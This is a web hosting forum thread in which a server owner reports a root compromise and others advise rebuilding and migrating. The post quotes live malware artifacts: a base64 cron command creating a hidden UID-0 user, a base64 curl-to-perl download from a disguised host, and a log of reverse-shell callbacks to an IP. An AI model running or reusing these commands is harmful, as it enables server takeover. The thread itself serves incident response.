System compromised
Hey all,
At the beginning of this month I had strong evidence that my system was compromised. It was possibly due to lack of cpanel services certificate renewal (which issue is now resolved)
There was a new root user created (named as 'config') which I found and deleted. Also there were some cron jobs running which I removed. They were trying to create a new user.
Two days after the initial discovery the apache log folder was deleted, which I just recreated and everything was back in order (seemingly at least)
Finally there was a suspicious (root) process running that I found and deleted. When I stopped the process I received an email (from the process).
Cron job (/etc/cron.d/man-db and /etc/cron.d/0hourly)
*/5 * * * * root echo dXNlcmFkZCAtbyAtdSAwIGZpeCAmJiBlY2hvICI0c0lYUzFQaGc5M10iIHwgcGFzc3dkIGZpeCAtLXN0ZGlu|base64 -d|sh
Process:
root 1769824 0.0 0.0 11304 2500 ? S Apr01 0:00 /usr/sbin/CRON -f
root 1769826 0.0 0.0 2608 528 ? Ss Apr01 0:00 \_ /bin/sh -c echo Y3VybCBodHRwOi8vd2ViLndpbmRvd3N1cGRhdGUuYnV6ei9jb25maWcucGx8cGVybA==|base64 -d|sh
root 1769829 0.0 0.0 2608 528 ? S Apr01 0:00 \_ sh
root 1769831 0.0 0.0 1452348 3416 ? Sl Apr01 1:08 \_ formsec
Mail I received after killing the process:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 10.1M 0 19952 0 0 24272 0 0:07:18 --:--:-- 0:07:18 24243
4 10.1M 4 446k 0 0 253k 0 0:00:41 0:00:01 0:00:40 253k
52 10.1M 52 5492k 0 0 2088k 0 0:00:04 0:00:02 0:00:02 2088k
100 10.1M 100 10.1M 0 0 3475k 0 0:00:02 0:00:02 --:--:-- 3473k
Making anonymous file...fd 3
Writing ELF binary to memory...done
Here we go...
2024/04/01 18:53:04 Starting shell callbacks to 34.84.42.35:8880
Would anyone suggest any additional steps I should take? Obviously I've blocked the IP that did the callbacks to.
I know that the most safe path is to re-install OS and cPanel, but it's a procedure I'll take if I see any indication that the server is still compromised.
-
All I will say is that the email you got with the base64 stuff presumably added a user named "fix" with and set a specific password on it. UID of the new user was 0 (root).
Take that for what it is worth. Sounds like it's time to build a new machine
0 -
/etc/passwd shows no other user than 'root' with root permissions. Also there is no 'fix' user with any permissions/group whatsoever.
The same is for /etc/shadow, no encrypted password there for a user with that name.
While the cron was running I kept receiving emails from the system that it was trying (unsuccessfully) to create a new user.
Could it be 'hiding' in any other way?
0 -
There is no way to "fix" a compromised machine - you'll need to either migrate or restore content to a new server.
0 -
Noted! This is going to be my path now.. Is migrating the accounts safe? I'm planning to use WHM account transfer tool. Do you support it will also transfer 'bad' files?
0 -
Transfer Tool is also what we use to migrate compromised systems. If the bad data is inside a user account, that would get migrated, but extra root users and whatnot is not something it would move.
0 -
Thanks to both of you. That was really insightful info! I've got some work to do now!
2 -
In the future make sure your OS is up2date as well as cPanel/WHM.
It would not be a bad thing either to use CloudLinux, CSF & Imunify360 well. Very good software even though it costs it will save you hours of work in the future having to deal with security issues. I use them all and I dont regret the money spent on it.
0
Please sign in to leave a comment.
Comments
7 comments